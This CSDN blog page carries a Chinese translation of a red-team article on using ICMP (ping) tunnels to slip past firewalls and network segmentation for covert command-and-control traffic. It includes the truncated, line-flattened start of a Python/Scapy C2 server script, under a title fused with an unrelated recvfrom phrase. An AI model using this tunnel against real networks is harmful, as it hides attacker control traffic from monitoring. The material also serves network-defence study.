recvfrom 无法接收 icmp 差错数据包_利用ICMP隧道技术实现C2通信

最新推荐文章于 2022-03-08 17:43:44 发布
最新推荐文章于 2022-03-08 17:43:44 发布
阅读量211 收藏
点赞数
文章标签: recvfrom 无法接收 icmp 差错数据包 利用trunk实现vlan内通信
本文介绍了如何使用ICMP隧道技术来绕过网络障碍,如防火墙和分段策略。攻击者通过将HTTP数据包封装在ICMP的有效载荷中,借助代理服务器进行隐蔽通信,以此逃避检测。这种技术常用于红队行动,以实现与C&C服务器的隐秘连接。文中还提供了一个简单的Python PoC代码示例,展示了ICMP隧道的工作原理。
摘要由CSDN通过智能技术生成
9702ecce59bc4c109ea13e5b82ae4adc.png

本文为翻译文章,原文链接见文末。(翻译为脉搏首发)

一般来说,攻击者在行动过程中经常需要面对诸多的挑战,例如:

  • 克服网络障碍(网络策略、分段等)。在“隐形模式”下完成各项操作,这样,就不会被逮到了。

应对这些挑战的一个好方法是,当试图创建一个能够跨越网络中各种障碍的隐蔽连接时,使用ICMP隧道技术。

在计算机网络中,隧道技术通常是将一个网络协议封装为另一个网络协议的有效载荷(payload,即传输的数据),详情请参阅这篇文章。

ICMP(Internet Control Message Protocol)是Internet协议簇中的一个支持协议。网络设备可以使用它来发送错误消息和操作信息。其中,最常见的ICMP消息可能也是最常用的消息就是Ping消息。

实际上,Ping是一种控制消息,也是ICMP(Internet Control Message Protocol)协议的一个组成部分。

Ping消息可以从网络中的一个节点发送到另一个节点。该消息是由第2层和第3层报头(由OSI模块定义的MAC和IP报头)以及一个特殊的ICMP数据包构成的。发送节点需要设置目的地参数,如果目的地节点收到该消息,它会立即返回该消息。

e6117c99a21e286c38474de81612067b.png

下面是ping数据包的IP数据报格式:

566cbdcfbaf892e5ab15e58ec284c903.png

ICMP隧道可以通过修改有效载荷数据来实现,这样,它就能在其中存放我们想要发送的数据了。

通常情况下,它会包含默认的有效载荷数据,如ASCII字符串“abcdefghijklmnopqrstuvwabcdefghi”等。

6327a6fb14656a00f06a4cf1e8ea07ec.png

Wireshark——ICMP数据包及有效载荷数据

如果将HTTP数据包封装在有效载荷数据中的话,就是这种方法最常用的一种方式——WiFi蹭网。

此外,这可以通过使用代理服务器来实现,代理服务器会等待ping消息,并根据需要发送它们(例如,作为HTTP)。

e7d9b18f68f44eabb1242c63ef2d7455.png

借助于正确的工具(如ptunnel),我们可以将要发送到Google的HTTP数据包封装到ping数据包中(即有效载荷数据内)。然后,将其发送到作为目的地的代理服务器IP地址处。

注意:该IP并非HTTP数据包的目的地(HTTP数据包的IP目的地应该是http://www.google.com域名对应的IP地址)

由于机场的路由器通常允许ICMP流量流出网络,因此,它会将Ping消息传递给代理服务器。

代理服务器接收Ping数据包后,会将其分成两部分:

  • ICMP头部。包含原始HTTP消息的有效载荷。

注意:代理发送给Google的HTTP数据包的源IP地址应该是代理服务器本身的IP地址,而不是笔记本电脑的IP地址(或机场的路由器的地址......),因为Google应该回复的对象是代理,而不是您。

这可能是ICMP隧道最常见的用法,但作为一名红队成员,我发现这的确是一种逃避防火墙和其他网络策略的“隐身”方法,所以,它是非常有用的。

上面所说的这一切都是可能的,因为Ping消息可以通过“Pay-for-WiFi”局域网中的路由器进入互联网。

那么,为什么人们会允许这种情况发生呢?

作为一名前网络工程师,我可以告诉大家的是,在尝试理解和解决非常复杂的网络问题时,Ping是不可或缺的。

大多数网络故障排除过程都是从测试信息是否能够从一个节点传送到另一节点开始的,即弄清楚:这条信息路线是否可行?网络组件是否处于可用状态并且能够正常响应?

面对这些问题,Ping消息可以用最简单的方式提供答案,当然,它还能够用来解决许多其他方面的疑问。

实际上,这些故障排除工作几乎每天都会遇到。这就意味着,相关的网络配置必须允许将网络上的Ping消息从一个节点传输到另一个节点。同时,所有防火墙策略、路由器策略和交换机ACL(访问列表)都必须允许ICMP消息从任何网络组件传输到任何其他组件。

这就是为什么Ping消息几乎不会受到网络分段和网络策略方面的影响的原因。

既然如此,在网络中创建连接时,为了克服网络分段和网络策略等障碍,可以让代理使用ICMP隧道来连接C&C服务器——这是一个非常棒的主意。

为此,我用Python编写了一个简单的POC代码,以用来演示其工作机制。

请注意:

-该PoC要求安装Scapy(实际上,Scapy是一个很好的学习工具)

-该PoC没有涉及分段处理。例如,如果来自代理的应答大于允许的有效载荷数据的上限,则会对其进行分段。

该PoC还包含了一个C&C服务器和一个代理。其中,C2服务器将通过ICMP隧道向代理发送指令,代理也将通过ICMP隧道来返回相应的结果。

C2.py

#!/usr/bin/env python3from scapy.all import * def main(): while True: command = raw_input('# Enter command: ') # build the ICMP packet with the command as the payload pinger = IP(dst="localhost")/ICMP(id=0x0001, seq=0x1)/command send(pinger) # wait for the ICMP message containing the answer from the agent  # to be received rx = sniff(count=1, timeout=2) # use this if agent is not on local machine: rx = sniff(filter="icmp
weixin_39614109
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux收不到icmp数据,linux – ICMP Host Unreachable消息导致火星源数据包
weixin_33236271的博客
05-13 947
我一直试图在我们的路由/防火墙设置中了解一段特殊的行为已经有一段时间了,但是我并不真正了解正在发生的事情.我们有一个防火墙/路由器设备,它有两个面向外部的接口和许多内部VLAN.当我们的访客WiFi网络VLAN 99上的客户端(本例中的MAC f4:f5:d8:d2:f2:4c,IP 10.99.154.254)向某个互联网主机8.8.8.8发送ping回应请求时,会观察到特定行为,我们禁止的.路...
python构造icmp数据包_ICMP协议Ping方法的Python实现解析
weixin_39762001的博客
12-03 494
#!/usr/bin/env python# -*- coding: utf-8 -*-# @Author: Moming# 2016-04-07# ping for Windowsimport osimport sysimport socketimport structimport selectimport timeimport ctypesICMP_ECHO_REQUEST = 8def re...
unreal c++实现一个防御塔_利用ICMP隧道技术实现C2通信
weixin_39710106的博客
10-29 210
本文为翻译文章,原文链接见文末。(翻译为脉搏首发)一般来说,攻击者在行动过程中经常需要面对诸多的挑战,例如:克服网络障碍(网络策略、分段等)。在“隐形模式”下完成各项操作,这样,就不会被逮到了。应对这些挑战的一个好方法是,当试图创建一个能够跨越网络中各种障碍的隐蔽连接时,使用ICMP隧道技术。在计算机网络中,隧道技术通常是将一个网络协议封装为另一个网络协议的有效载荷(payload,即传输的数据)...
recvfrom 无法接收 icmp 差错数据包_麻雀虽小,必不可少ICMP
weixin_39541869的博客
12-01 710
PART1Wish you were here!ICMP简介ICMP(InternetControlMessageProtocol),中文名为网络控制报文协议,它是TCP/IP协议族的一个子协议,归属于网络层协议。ICMP协议是一种面向无连接的协议,用于传输出错报告控制信息,括报告错误、交换受限控制和状态信息等。当遇到IP数据无法访问目标、IP路由器无法按当前的传输速率转发数据包...
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8087
icmp隧道的利用
隐藏c2隧道---ICMPicmpsh的使用
qq_61142406的博客
02-12 3956
隐藏c2隧道---ICMPicmpsh的使用
icmp.rar_ICMP Delphi_delphi icmp ping_icmp
09-23
通过学习和理解"icmp.pas"中的代码,开发者可以了解如何在Delphi环境下使用Winsock API直接与网络底层通信实现类似ping这样的网络诊断工具。同时,"www.pudn.com.txt"文件可能提供了额外的背景资料和资源来源信息...
icmp.rar_icmp
09-24
4. **数据包接收**:通过`recvfrom()`函数接收ICMP响应,并解析报文头以获取相关信息。 5. **错误处理**:处理可能的网络错误,如超时、重试等。 由于没有具体的源代码内容,更深入的分析无法进行。然而,理解这些...
tcp.rar_UDP recvfrom_tcp_tcp sendto_udp 函数_udp_sendto
09-24
在IT行业中,网络通信是至关重要的一个领域,TCP(传输控制协议)和UDP(用户数据报协议)是两种主要的...而`recvfrom`和`sendto`等函数则是实现这些协议的关键工具,通过它们,开发者能够构建起强大的网络通信系统。
Recvpack.rar_ARP UDP_UDP协议数据包_recvpack
09-23
"Recvpack"程序是一个能够接收并处理多种网络协议数据包的工具,括TCP、UDP、ICMP和ARP。这个程序的实现涉及到了网络编程的基本概念和技术,如套接字编程、网络数据包解析等。通过使用recvfrom函数,该程序可以从...
icmp报文格式_隧道攻防之ICMP隧道
weixin_39853863的博客
11-24 642
ICMP隧道简介icmp协议简介ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。ICMP的报文格式如下:其中0-31是各...
C++ UDP通信接收数据包的代码
最新发布
03-10
以下是 C 语言中 UDP 通信接收数据包的代码示例: ```c #include #include ...以上代码实现了 UDP 通信接收端,通过创建 socket、绑定地址、接收数据包等步骤,可以实现接收 UDP 数据包的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值